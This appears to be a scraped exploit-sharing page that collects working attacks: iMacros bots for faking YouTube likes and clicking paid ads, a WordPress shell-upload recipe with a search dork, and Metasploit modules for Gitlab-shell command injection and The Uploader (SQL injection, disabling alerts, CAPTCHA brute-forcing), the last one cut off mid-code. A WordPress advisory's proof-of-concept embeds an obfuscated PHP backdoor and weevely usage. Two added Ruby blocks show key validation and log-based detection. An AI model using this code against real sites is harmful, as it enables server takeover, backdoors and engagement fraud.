xDay Exploit
v10
name author perms com modified label

Likesplanet [ Dislike , Likes ] YouTube Videos Exploit [Imacros] Unknown rwxr-xr-x 3 12:42 PM

Filename Likesplanet [ Dislike , Likes ] YouTube Videos Exploit [Imacros]
Permission rw-r--r--
Author Unknown
Date and Time 12:42 PM
Label
Action
# Without pressing Like or Dislike

VERSION BUILD=8820413 RECORDER=FX
TAB T=1
URL GOTO=[ xDay-Exploit.blogspot.com ]
TAG POS=1 TYPE=INPUT:SUBMIT ATTR=*
TAB T=2
WAIT SECONDS=2
TAB CLOSE
WAIT SECONDS=7
TAG POS=1 TYPE=INPUT:SUBMIT ATTR=*
TAB T=2
WAIT SECONDS=2
TAB CLOSE
WAIT SECONDS=7
TAG POS=1 TYPE=INPUT:SUBMIT ATTR=*
TAB T=2
WAIT SECONDS=2
TAB CLOSE
WAIT SECONDS=7
TAG POS=1 TYPE=INPUT:SUBMIT ATTR=*
TAB T=2
WAIT SECONDS=2
TAB CLOSE
WAIT SECONDS=7

Change [ xDay-Exploit.blogspot.com ] To :
For YouTube Videos Likes : http://likesplanet.com/ytlike.php
For YouTube Dislike Videos : http://likesplanet.com/ytdislike.php

# Anass Ibn El Farouk

Paidverts [Imacros] Exploit Unknown rwxr-xr-x 1 12:37 PM

'Paidverts Auto Clicker Version 1.1
' !!! WARNING !!! DO NOT MAKE AMENDMENTS TO THE SCRIPT OF ANY SORT UNLESS YOU KNOW WHAT YOU'RE DOING !!!//
VERSION BUILD=8810214 RECORDER=FX
SET !ERRORIGNORE YES
SET !EXTRACT_TEST_POPUP NO
SET !TIMEOUT_PAGE 15
TAB T=1
URL GOTO=http://paidverts.com
WAIT SECONDS=2.5
TAG POS=1 TYPE=A ATTR=TXT:MEMBERS<SP>HOME<SP>PAGE
WAIT SECONDS=1.5
TAG POS=1 TYPE=SPAN ATTR=TXT:VIEW<SP>PAID<SP>ADS
WAIT SECONDS=1.5
TAG POS=1 TYPE=A ATTR=ID:view-1
WAIT SECONDS=2.5
TAG POS=1 TYPE=DIV ATTR=ID:t-1 EXTRACT=TXT
SET !VAR1 {{!EXTRACT}}
TAG POS=1 TYPE=INPUT:TEXT ATTR=ID:text-1 CONTENT={{!VAR1}}
SET !EXTRACT NULL
WAIT SECONDS=3.5
TAG POS=1 TYPE=DIV ATTR=ID:t-2 EXTRACT=TXT
SET !VAR2 {{!EXTRACT}}
TAG POS=1 TYPE=INPUT:TEXT ATTR=ID:text-2 CONTENT={{!VAR2}}
SET !EXTRACT NULL
WAIT SECONDS=3.5
TAG POS=1 TYPE=DIV ATTR=ID:t-3 EXTRACT=TXT
SET !VAR3 {{!EXTRACT}}
TAG POS=1 TYPE=INPUT:TEXT ATTR=ID:text-3 CONTENT={{!VAR3}}
SET !EXTRACT NULL
WAIT SECONDS=3.5
TAG POS=1 TYPE=INPUT:SUBMIT ATTR=ID:view_ad
WAIT SECONDS=3
TAB T=2
WAIT SECONDS=35
TAG POS=1 TYPE=INPUT:SUBMIT ATTR=ID:button
WAIT SECONDS=8
TAB T=1
TAB CLOSEALLOTHERS
WAIT SECONDS=2.5
TAG POS=1 TYPE=A ATTR=TXT:View<SP>another<SP>ad
WAIT SECONDS=10
' End of Code

Wordpress Lazy SEO plugin 1.1.9 - Shell Upload Vulnerability Unknown rwxr-xr-x 1 10:22 AM

#######################################################################
# Exploit Title : Wordpress Lazy SEO plugin Shell Upload Vulnerability
# Exploit Author : Ashiyane Digital Security Team
# Google Dork : inurl:/wp-content/plugins/lazy-seo/
# Date: 2013/09/21
# Software Link : http://downloads.wordpress.org/plugin/lazy-seo.1.1.9.zip
# Version : 1.1.9
# Tested on: Windows
##############
#
#Location: Site/wp-content/plugins/lazy-seo/lazyseo.php
#
##############
#1. Go to address : Site/wp-content/plugins/lazy-seo/lazyseo.php
#2. Click on Browse...
#3. Select Shell Code
#4. Complete the fields
#5. Press Enter
#6. Shell Address : wp-content/plugins/lazy-seo/Shell.php
##############

Gitlab-shell Code Execution Unknown rwxr-xr-x 1 10:20 AM

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'net/ssh'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Gitlab-shell Code Execution',
      'Description'    => %q(
        This module takes advantage of the addition of authorized
        ssh keys in the gitlab-shell functionality of Gitlab. Versions
        of gitlab-shell prior to 1.7.4 used the ssh key provided directly
        in a system call, resulting in a command injection vulnerability. As
        this relies on adding an ssh key to an account, valid credentials
        are required to exploit this vulnerability.
      ),
      'Author'  =>
        [
          'Brandon Knight'
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['URL', 'https://about.gitlab.com/2013/11/04/gitlab-ce-6-2-and-5-4-security-release/'],
          ['CVE', '2013-4490']
        ],
      'Platform'  => 'linux',
      'Targets'        =>
        [
          [ 'Linux',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86
            }
          ],
          [ 'Linux (x64)',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86_64
            }
          ],
          [ 'Unix (CMD)',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Payload' =>
                {
                  'Compat'      =>
                    {
                      'RequiredCmd' => 'openssl perl python'
                    },
                  'BadChars' => "\x22"
                }
            }
          ],
          [ 'Python',
            {
              'Platform' => 'python',
              'Arch' => ARCH_PYTHON,
              'Payload' =>
                {
                  'BadChars' => "\x22"
                }
            }
          ]
        ],
      'CmdStagerFlavor' => %w( bourne printf ),
      'DisclosureDate' => 'Nov 4 2013',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('USERNAME',  [true, 'The username to authenticate as', 'root']),
        OptString.new('PASSWORD',  [true, 'The password for the specified username', '5iveL!fe']),
        OptString.new('TARGETURI', [true,  'The path to Gitlab', '/'])
      ], self.class)
  end

  def exploit
    login
    case target['Platform']
    when 'unix'
      execute_command(payload.encoded)
    when 'python'
      execute_command("python -c \\\"#{payload.encoded}\\\"")
    when 'linux'
      execute_cmdstager(temp: './', linemax: 2800)
    end
  end

  def execute_command(cmd, _opts = {})
    key_id = add_key(cmd)
    delete_key(key_id)
  end

  def check
    res = send_request_cgi('uri' => normalize_uri(target_uri.path.to_s, 'users', 'sign_in'))
    if res && res.body && res.body.include?('GitLab')
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Unknown
    end
  end

  def login
    username = datastore['USERNAME']
    password = datastore['PASSWORD']
    signin_page = normalize_uri(target_uri.path.to_s, 'users', 'sign_in')

    # Get a valid session cookie and authenticity_token for the next step
    res = send_request_cgi(
                            'method' => 'GET',
                            'cookie' => 'request_method=GET',
                            'uri'    => signin_page
    )

    fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during login") unless res

    local_session_cookie = res.get_cookies.scan(/(_gitlab_session=[A-Za-z0-9%-]+)/).flatten[0]
    auth_token = res.body.scan(/<input name="authenticity_token" type="hidden" value="(.*?)"/).flatten[0]

    if res.body.include? 'user[email]'
      @gitlab_version = 5
      user_field = 'user[email]'
    else
      @gitlab_version = 7
      user_field = 'user[login]'
    end

    # Perform the actual login and get the newly assigned session cookie
    res = send_request_cgi(
                            'method' => 'POST',
                            'cookie' => local_session_cookie,
                            'uri'    => signin_page,
                            'vars_post' =>
                              {
                                'utf8' => "\xE2\x9C\x93",
                                'authenticity_token' => auth_token,
                                "#{user_field}" => username,
                                'user[password]' => password,
                                'user[remember_me]' => 0
                              }
                          )

    fail_with(Failure::NoAccess, "#{peer} - Login failed") unless res && res.code == 302

    @session_cookie = res.get_cookies.scan(/(_gitlab_session=[A-Za-z0-9%-]+)/).flatten[0]

    fail_with(Failure::NoAccess, "#{peer} - Unable to get session cookie") if @session_cookie.nil?
  end

  def add_key(cmd)
    if @gitlab_version == 5
      @key_base = normalize_uri(target_uri.path.to_s, 'keys')
    else
      @key_base = normalize_uri(target_uri.path.to_s, 'profile', 'keys')
    end

    # Perform an initial request to get an authenticity_token so the actual
    # key addition can be done successfully.
    res = send_request_cgi(
                            'method' => 'GET',
                            'cookie' => "request_method=GET; #{@session_cookie}",
                            'uri'    => normalize_uri(@key_base, 'new')
    )

    fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res

    auth_token = res.body.scan(/<input name="authenticity_token" type="hidden" value="(.*?)"/).flatten[0]
    title = rand_text_alphanumeric(16)
    key_info = rand_text_alphanumeric(6)

    # Generate a random ssh key
    key = OpenSSL::PKey::RSA.new 2048
    type = key.ssh_type
    data = [key.to_blob].pack('m0')

    openssh_format = "#{type} #{data}"

    # Place the payload in to the key information to perform the command injection
    key = "#{openssh_format} #{key_info}';#{cmd}; echo '"

    res = send_request_cgi(
                            'method' => 'POST',
                            'cookie' => "request_method=GET; #{@session_cookie}",
                            'uri'    => @key_base,
                            'vars_post' =>
                              {
                                'utf8' => "\xE2\x9C\x93",
                                'authenticity_token' => auth_token,
                                'key[title]' => title,
                                'key[key]' => key
                              }
                          )

    fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res

    # Get the newly added key id so it can be used for cleanup
    key_id = res.headers['Location'].split('/')[-1]

    key_id
  end

  def delete_key(key_id)
    res = send_request_cgi(
                             'method' => 'GET',
                             'cookie' => "request_method=GET; #{@session_cookie}",
                             'uri'    => @key_base
                           )

    fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res

    auth_token = res.body.scan(/<meta content="(.*?)" name="csrf-token"/).flatten[0]

    # Remove the key which was added to clean up after ourselves
    res = send_request_cgi(
                             'method' => 'POST',
                             'cookie' => "#{@session_cookie}",
                             'uri'    => normalize_uri("#{@key_base}", "#{key_id}"),
                             'vars_post' =>
                             {
                               '_method' => 'delete',
                               'authenticity_token' => auth_token
                             }
                           )

    fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res
  end
end
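
The module above reaches a shell through the comment field of an SSH public key, which gitlab-shell before 1.7.4 interpolated into a system call. The Ruby below is an added example (not code from the module, Metasploit or GitLab) of the defender-side control: strict validation of an OpenSSH key line before it reaches any command, so a key carrying quotes, semicolons or extra whitespace is rejected. The allow-list, the function names and the generated sample keys are constructed for this example.

```ruby
require 'base64'
require 'openssl'

# Key types accepted by this check (constructed allow-list for the example).
KEY_TYPES = %w[ssh-rsa ssh-ed25519 ecdsa-sha2-nistp256
               ecdsa-sha2-nistp384 ecdsa-sha2-nistp521].freeze

# The comment is the field the module abuses ("name';<cmd>; echo '").
# Only a conservative character set is allowed: no quotes, semicolons,
# whitespace or other shell metacharacters.
COMMENT_RE = /\A[A-Za-z0-9@._-]{1,64}\z/

# Returns true only for a single-line "type base64blob [comment]" entry whose
# blob decodes and whose embedded type string matches the text field.
def valid_openssh_key?(line)
  return false unless line.is_a?(String)
  return false if line.match?(/[\r\n]/)          # one key per line, no injection of extra lines
  parts = line.strip.split(' ')                   # any extra whitespace-separated token fails
  return false unless parts.size.between?(2, 3)
  type, blob, comment = parts
  return false unless KEY_TYPES.include?(type)
  raw = begin
    Base64.strict_decode64(blob)                  # strict: rejects stray characters
  rescue ArgumentError
    return false
  end
  return false if raw.bytesize < 4
  len = raw.byteslice(0, 4).unpack1('N')          # first field: length-prefixed type string
  return false unless raw.byteslice(4, len) == type
  comment.nil? || comment.match?(COMMENT_RE)
end

# --- helpers that build a genuine ssh-rsa line for the demonstration -------
def ssh_string(s)
  [s.bytesize].pack('N') + s
end

def ssh_mpint(n)
  hex = n.to_s(16)
  hex = '0' + hex if hex.length.odd?
  bytes = [hex].pack('H*')
  bytes = "\x00".b + bytes if bytes.getbyte(0) >= 0x80   # keep the integer positive
  ssh_string(bytes)
end

def rsa_public_key_line(rsa, comment)
  blob = ssh_string('ssh-rsa') + ssh_mpint(rsa.e.to_i) + ssh_mpint(rsa.n.to_i)
  "ssh-rsa #{Base64.strict_encode64(blob)} #{comment}"
end

if $PROGRAM_NAME == __FILE__
  rsa  = OpenSSL::PKey::RSA.new(2048)
  good = rsa_public_key_line(rsa, 'deploy@build01')
  bad  = rsa_public_key_line(rsa, "x';id; echo '")   # the shape the module submits
  puts "genuine key accepted:  #{valid_openssh_key?(good)}"
  puts "injected key accepted: #{valid_openssh_key?(bad)}"
end
```

Validation is only half of the fix; the other half is passing the key to helper programs as a separate argument vector, never as a string handed to a shell.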

WordPress Slideshow Gallery Plugin 1.4.6 - Shell Upload Vulnerability Unknown rwxr-xr-x 1 10:20 AM

Summary: WordPress Slideshow Gallery plugin version 1.4.6 suffers from a remote shell upload vulnerability.
Date: 2014-08-28
Vendor Homepage: http://tribulant.com/
Software: Slideshow Gallery
Version: 1.4.6
Software Link: http://downloads.wordpress.org/plugin/slideshow-gallery.1.4.6.zip
Tested on: Windows 7 OS, Wordpress 3.9.2 and Chrome Browser.

Description:

I found a serious security vulnerability in the Slideshow Gallery plugin. This bug allows an attacker to upload any PHP file remotely to the vulnerable website (administrator by default). I have tested and verified that having the current version of the plugin installed in a WordPress installation will allow any registered user (Administrator, Editor, Author, Contributor and Subscriber) to upload a PHP shell to exploit the host system.

Backdoor location: http://VICTIM/wordpress/wp-content/uploads/slideshow-gallery/backdoor.php

Today (2014-08-29), I notified the vendor and they gave me feedback about the vulnerability by email. The vendor released a patch a few hours ago (SlideShow Gallery version 1.4.7 at https://wordpress.org/plugins/slideshow-gallery/changelog).

Proof of Concept (PoC):

1. An attacker uploads a PHP shell file (e.g. backdoor.php):

POST http://192.168.31.128/wordpress/wp-admin/admin.php?page=slideshow-slides&method=save HTTP/1.1
Host: 192.168.31.128
Connection: keep-alive
Content-Length: 2168
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.31.128
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEGMugMZ1CVkRzbxV
DNT: 1
Referer: http://192.168.31.128/wordpress/wp-admin/admin.php?page=slideshow-slides&method=save
Accept-Encoding: gzip,deflate
Accept-Language: es-ES,es;q=0.8,en;q=0.6,it;q=0.4,und;q=0.2
Cookie: wordpress_a8ed7709a5b8081c924ceda6269a7962=master%7C1409465845%7C9ee160d2851bbcdaa2865e9010d92d46; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_a8ed7709a5b8081c924ceda6269a7962=master%7C1409465845%7C0565892d6d7f9de1022e4ad95b45d4ac; wp-settings-1=libraryContent%3Dupload%26editor%3Dtinymce; wp-settings-time-1=1409293045

------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[id]"

------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[order]"

------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[title]"

Test Shell Upload
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[description]"

------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[showinfo]"

both
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[iopacity]"

70
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[galleries][]"

1
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[type]"

file
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="image_file"; filename="backdoor.php"
Content-Type: application/octet-stream

<?php
$kvgk = str_replace("y","","ysytyry_yreypylyayce"); $dawj="pdGV4cGxvaXQnO2VzhjaGzh8gJzwnLiRrzhLic+JzzhtldmFsKGJhc2U2NF9kZWNvZGUz"; $asrp="gnJywnKycpLCBqb2luKGFycmF5X3NsaWNlKCRhLCRjKzhCRhKS0zKSkpKSk7ZWzhNobyAnPC8nLzhiR rLic+Jzt9"; $gxfr="hocHJlZ19yzhZXBsYzhWNlKzhGFycmF5KCcvW15cdz1cc1zh0vJywnzhLzh1xzzhLycpLCBhcnJheSz h"; $fdcd="JGM9J2NvdW50JzskYT0kX0NPT0tJRTtpZihzhyZXNldCgkYSk9PSd3zhaCcgJiYgJGMzhoJGEpPjMpe zhyRrPSd";
$uuod = $kvgk("j", "", "bjase6j4j_jdjejcjojde");
$qcon = $kvgk("av","","avcraveaavteav_avfavuavnavcavtiavoavn");
$rpgy = $qcon('', $uuod($kvgk("zh", "", $fdcd.$dawj.$gxfr.$asrp))); $rpgy();
?>
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[image_url]"

------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[uselink]"

N

------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[link]"

------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[linktarget]"

self
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="submit"

Save Slide
------WebKitFormBoundaryEGMugMZ1CVkRzbxV--

2. The backdoor is located at http://VICTIM/wordpress/wp-content/uploads/slideshow-gallery/backdoor.php

3. The attacker uses a security tool (e.g. weevely) to communicate with the backdoor.

#weevely http://VICTIM/wordpress/wp-content/uploads/slideshow-gallery/backdoor.php whitexploit

Now the attacker has a “telnet-like console” and, with it, remote control of the vulnerable website.

Vulnerability Disclosure Timeline:
2014-08-28: Discovered vulnerability
2014-08-29: Vendor Notification (support@tribulant.com)
2014-08-29: Vendor Response/Feedback
2014-08-29: Vendor Fix/Patch
2014-08-30: Public Disclosure
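
Detection logic for the pattern in this advisory, as an added example that is not part of the original report: it reads web-server access logs in combined format and flags any request for a script file under the plugin's upload directory, rating it high when the same client posted to the slide-save endpoint shortly before. The log excerpt, the ten-minute window and the extension list are constructed for this example.

```ruby
require 'time'

# Combined log format as written by Apache/nginx (sample lines are constructed).
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+)[^"]*" (?<status>\d{3}) \S+/

# The plugin stores slide images here; nothing executable should ever be served from it.
UPLOAD_DIR = '/wp-content/uploads/slideshow-gallery/'
EXEC_EXT   = %w[.php .php5 .phtml .phar].freeze

# Constructed access-log excerpt: one client saves a slide and then fetches a
# .php file from the gallery directory; another fetches a script with no prior
# save; a third only loads a legitimate image; the last line is malformed.
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [29/Aug/2014:10:02:11 +0000] "POST /wordpress/wp-admin/admin.php?page=slideshow-slides&method=save HTTP/1.1" 302 0
  203.0.113.7 - - [29/Aug/2014:10:02:19 +0000] "GET /wordpress/wp-content/uploads/slideshow-gallery/backdoor.php HTTP/1.1" 200 15
  198.51.100.4 - - [29/Aug/2014:10:05:01 +0000] "GET /wordpress/wp-content/uploads/slideshow-gallery/holiday.jpg HTTP/1.1" 200 48211
  198.51.100.9 - - [29/Aug/2014:10:07:40 +0000] "GET /wordpress/wp-content/uploads/slideshow-gallery/shell.PHP?x=1 HTTP/1.1" 404 209
  this line is not in combined format and is skipped
LOG

def parse_line(line)
  m = LOG_RE.match(line)
  return nil unless m
  { ip: m[:ip], time: Time.strptime(m[:time], '%d/%b/%Y:%H:%M:%S %z'),
    method: m[:method], path: m[:path], status: m[:status].to_i }
end

# POST to the slide-save handler used by the PoC request above.
def slide_save?(e)
  e[:method] == 'POST' &&
    e[:path].include?('page=slideshow-slides') && e[:path].include?('method=save')
end

# Any request for a script-like file under the gallery upload directory,
# judged on the path with the query string removed and the extension lowercased.
def script_in_uploads?(e)
  path = e[:path].split('?', 2).first
  path.include?(UPLOAD_DIR) && EXEC_EXT.include?(File.extname(path).downcase)
end

# Returns one finding per suspicious request. A script request that follows a
# slide save from the same client within +window+ seconds is rated high; a
# script request with no preceding save is still reported, at medium.
def detect_slideshow_upload(lines, window: 600)
  last_save = {}   # client ip => time of its most recent slide-save POST
  findings = []
  lines.each do |line|
    e = parse_line(line)
    next unless e
    last_save[e[:ip]] = e[:time] if slide_save?(e)
    next unless script_in_uploads?(e)
    saved_at = last_save[e[:ip]]
    recent = saved_at && (e[:time] - saved_at).between?(0, window)
    findings << {
      ip: e[:ip], path: e[:path], status: e[:status],
      severity: recent ? 'high' : 'medium',
      reason: recent ? 'slide save followed by script request in gallery upload directory' :
                       'script requested from gallery upload directory'
    }
  end
  findings
end

if $PROGRAM_NAME == __FILE__
  detect_slideshow_upload(SAMPLE_LOG.lines).each do |f|
    puts "#{f[:severity].upcase} #{f[:ip]} #{f[:path]} (HTTP #{f[:status]}): #{f[:reason]}"
  end
end
```

A 404 on the script request is reported as well, since a probe for a file that is not there is the same behaviour one step earlier.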

The Uploader 2.0.4 (Eng/Ita) Remote File Upload Remote Code Execution Unknown rwxr-xr-x 0 10:19 AM

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::HttpClient

    def initialize(info = {})
        super(update_info(info,
            'Name'              => 'The Uploader 2.0.4 (Eng/Ita) Remote File Upload',
            'Description'=> %q{
                    This module exploits various flaws in The Uploader to upload a PHP payload
                    to target system. When run with defaults it will search possible URIs for
                    the application and exploit it automatically. Works against both English
                    and Italian language versions. Notably it disables pre-emptive email warnings
                    before uploading the payload, though it leaves log cleanup as a
                    post-exploitation task.
            },
            'Author'            => [ 'Danny Moules' ],
            'References'        =>
                [
                    [ 'URL', 'http://sourceforge.net/projects/theuploader' ],
                    [ 'CVE', '2011-2944' ],
                ],
            'Privileged'        => false,
            'Payload'           =>
                {
                    'DisableNops'   => true,
                    'Keys'        => ['php'],
                },
            'License'           => MSF_LICENSE,
            'Platform'          => 'php',
            'Arch'              => ARCH_PHP,
            'Targets'           => [[ 'Automatic', { }]],
            'DefaultTarget'     => 0,
            'DisclosureDate'    => 'Feb 23 2012',
        ))

        register_options([
            Opt::RHOST,
            Opt::RPORT(80),
            OptString.new(
                'URI',
                [ true, 'Path of application root (default will try common targets)', '/' ]
            ),
            OptInt.new(
                'CRACKATTEMPTS',
                [ true, 'Brute force attempts, if required, to crack CAPTCHA', 200 ]
            ),
            OptBool.new(
                'VERBOSE',
                [ true, 'Verbose output', true ]
            ),
        ], self.class)
    end

    def get_strings(lang)
        if lang == "Eng"
            strings = {
                "sqlisuccess" => /Log-In has been done successfully/,
                "whitelistsuccess" => /The extension has been added successfully/,
                "disablemailsuccess" => /Notification Mail section has been saved successfully/,
                "changedirsuccess" => /Edit Upload Folder section has been saved successfully/,
                "captcharequired" => /No result entered/,
                "uploadsuccess" => /Download Link/,
                "disablecaptchasuccess" =>
                    /Upload Permissions section has been saved successfully/,
            }
        elsif lang == "Ita"
            strings = {
                "sqlisuccess" => /stato effettuato con successo/,
                "whitelistsuccess" => /L'estensione &egrave; stata consentita con successo/,
                "disablemailsuccess" => /Mail di Notifica &egrave; stata salvata con successo/,
                "changedirsuccess" =>
                    /Modifica Cartella Upload &egrave; stata salvata con successo/,
                "captcharequired" => /Non &agrave; stato inserito nessun risultato/,
                "uploadsuccess" => /Link al download/,
                "disablecaptchasuccess" => /Permessi Upload &egrave; stata salvata con successo/,
            }
        end
        return strings
    end

    def exploit
        #Analyse target
        analysis = analyse(datastore['URI'])
        print_status(analysis['status'])
        strings = get_strings(analysis['lang'])
        unless analysis['uri'].nil?
            datastore['URI'] = analysis['uri']
        end

        #Attempt SQLi - Gets the 'first' valid admin account
        data = "username=' OR activated=1-- a"
        data << "&password=a"
        data << "&login=Log-IN"

        res = send_and_verify(
            datastore['URI'] + "login.php",
            "POST",
            "application/x-www-form-urlencoded",
            "",
            data,
            "SQL injection",
            strings['sqlisuccess']
        )

        #Get cookies
        unless res.headers.include?('Set-Cookie')
            raise RuntimeError.new("Nobody gave us a cookie =( SQLi failed")
        end
        choc_chip = res.headers['Set-Cookie']
        if datastore["VERBOSE"]
            print_good("I stole the cookie from the cookie jar: #{choc_chip}")
        end

        #Optionally, analyse configuration
        if datastore["VERBOSE"]
            begin
                config = analyse_config(strings, choc_chip)
                print_status("INFO: Database host is #{config['db_host']}")
                print_status("INFO: Database username is #{config['db_user']}")
                print_status("INFO: Database password is #{config['db_pass']}")
                print_status("INFO: Database name is #{config['db_name']}")
                print_status("INFO: Admin log is #{config['admin_log']}")
            rescue ::Exception => e
                err = "Non-fatal error. Failed to analyse configuration: "
                err << "#{e.class.to_s} #{e.to_s}"
                print_error(err)
            end
        end

        #Whitelist .php extensions for upload
        res = send_and_verify(
            datastore['URI'] + "admin/ajaxmanager.php?section=upload&category=extensionadd",
            "POST",
            "application/x-www-form-urlencoded",
            choc_chip,
            "allowed_ext=php",
            "Whitelisting .php extensions",
            strings['whitelistsuccess']
        )

        # Disable email reporting
        res = send_and_verify(
            datastore['URI'] + "admin/ajaxmanager.php?section=upload&category=mail",
            "POST",
            "application/x-www-form-urlencoded",
            choc_chip,
            "upload_email=0",
            "Disabling email reporting",
            strings['disablemailsuccess']
        )

        # Change upload location to suit us
        data = "upload_directory="
        data << "&upload_full="
        data << datastore['RHOST']
        data << datastore['URI']

        res = send_and_verify(
            datastore['URI'] + "admin/ajaxmanager.php?section=upload&category=uploaddir",
            "POST",
            "application/x-www-form-urlencoded",
            choc_chip,
            data,
            "Changing upload directory to application root",
            strings['changedirsuccess']
        )

        #Disable CAPTCHA on upload (non-fatal)
        begin
            res = send_and_verify(
                datastore['URI'] + "admin/ajaxmanager.php?section=upload&category=captcha",
                "POST",
                "application/x-www-form-urlencoded",
                choc_chip,
                "captcha_upload=0",
                "Disabling CAPTCHA on upload",
                strings['disablecaptchasuccess']
            )
        rescue ::Exception
            print_error("Disabling CAPTCHA on upload failed. Will use cracker if necessary.")
        end

        #Upload PHP payload
        upload_uri = "ajax/upload.php"
        filename = "#{rand_text_alphanumeric(8)}.php"
        boundary = rand_text_alphanumeric(8)
        data = %Q{
--#{boundary}
Content-Disposition: form-data; name="upfile_1"; filename="#{filename}"
Content-Type: text/plain

<?php #{payload.encoded} ?>
--#{boundary}
        }

        res = send_request_raw({
            'uri'       =>  datastore['URI'] + upload_uri,
            'method'    => 'POST',
            'data'      => data + '--',
            'headers'   =>
                {
                    'Cookie'        => choc_chip,
                    'Content-Type'      => 'multipart/form-data; boundary=' + boundary,
                    'Content-Length'    => data.length + 2,
                },
        }, 20)

        #Verify response
        if res.code != 200
            raise RuntimeError.new("Uploading payload failed (HTTP code #{res.code.to_s})")
        end

        # If failure due to CAPTCHA, crack that...
        if res.body =~ strings['captcharequired']
            crack_captcha(data, choc_chip, boundary, upload_uri, strings)
        else
            if res.body =~ strings['uploadsuccess']
                if datastore["VERBOSE"]
                    print_good("Uploading payload succeeded, triggering...")
                end
            else
                err = "Response doesn't look right."
                err << " Uploading payload probably failed (will continue anyway)"
                print_error(err)
            end
        end

        #Attempt to trigger payload
        res = send_request_cgi({
            'uri'       =>  datastore['URI'] + filename,
            'method'    => 'GET',
            'headers'   =>
                {
                    'Cookie' => choc_chip,
                },
        }, 5)

        #Verify response
        if res and res.code != 200
            err = "Triggering payload (/#{filename}) failed "
            err << "(HTTP code #{res.code.to_s})"
            raise RuntimeError.new(err)
        else
            print_good("Triggering payload (/#{filename}) successful")
        end
    end

    def crack_captcha(data, choc_chip, boundary, upload_uri, strings)
        captcha_failed = true
        print_status("CAPTCHA is enabled. Transforming into brute-force CAPTCHA cracker *ping*")

        crack_data = %Q{
#{data}
Content-Disposition: form-data; name="result"

0
--#{boundary}
        }

        patience = datastore['CRACKATTEMPTS']
        for i in (1..patience)

            #First visit index page to trigger CAPTCHA reset
            res = send_request_cgi({
            'uri'       =>  datastore['URI'] + "index.php",
            'method'    => 'GET',
            'headers'   =>
                {
                    'Cookie' => choc_chip
                },
            }, 20)

            #Now try CAPTCHA with result 0. It'll happen eventually (1/30ish chance).
            #Maths-based CAPTCHAs are educational kids!
            res = send_request_raw({
                'uri'       =>  datastore['URI'] + upload_uri,
                'method'    => 'POST',
                'data'      => crack_data + '--',
                'headers'   =>
                    {
                        'Cookie'            => choc_chip,
                        'Content-Type'      => 'multipart/form-data; boundary=' + boundary,
                        'Content-Length'    => crack_data.length + 2,
                    },
            }, 20)

            if res.body =~ strings['uploadsuccess']
                captcha_failed = false
                break
            end
        end

        if captcha_failed
            err = "Could not break CAPTCHA in #{patience.to_s} iterations."
            err << " You might have luck retrying."
            raise RuntimeError.new(err)
        else
            print_good("CAPTCHA broken. Transforming back into a mild-mannered exploit *ping*")
        end
    end

    def send_and_verify(uri, method, ctype, cookie, data, intent, check)
        res = send_request_raw({
            'uri'       => uri,
            'method'    => method,
            'data'      => data,
            'headers'   =>
                {
                    'Cookie'            => cookie,
                    'Content-Type'      => ctype,
                    'Content-Length'    => data.length,
                },
        }, 20)

        #Verify response
        if res.code != 200
            raise RuntimeError.new("#{intent} failed (HTTP code #{res.code.to_s})")
        end
        unless res.body =~ check
            raise RuntimeError.new("Response doesn't look right. #{intent} probably failed")
        end

        if datastore["VERBOSE"]
            print_good("#{intent} succeeded")
        end

        return res
    end

    def analyse(uri_set)
        code = nil
        found_uri = nil
        status = "Unknown state"
        lang = "Eng"

        unless uri_set =~ /\/$/ then
            uri_set = "#{uri_set}/"
            print_status("URI automatically changed to #{uri_set}")
        end

        unless uri_set =~ /^\// then
            uri_set = "/#{uri_set}"
            print_status("URI automatically changed to #{uri_set}")
        end

        if uri_set == "/" then
            uris = [ "/", "/upload/", "/uploader/", "/theuploader/",
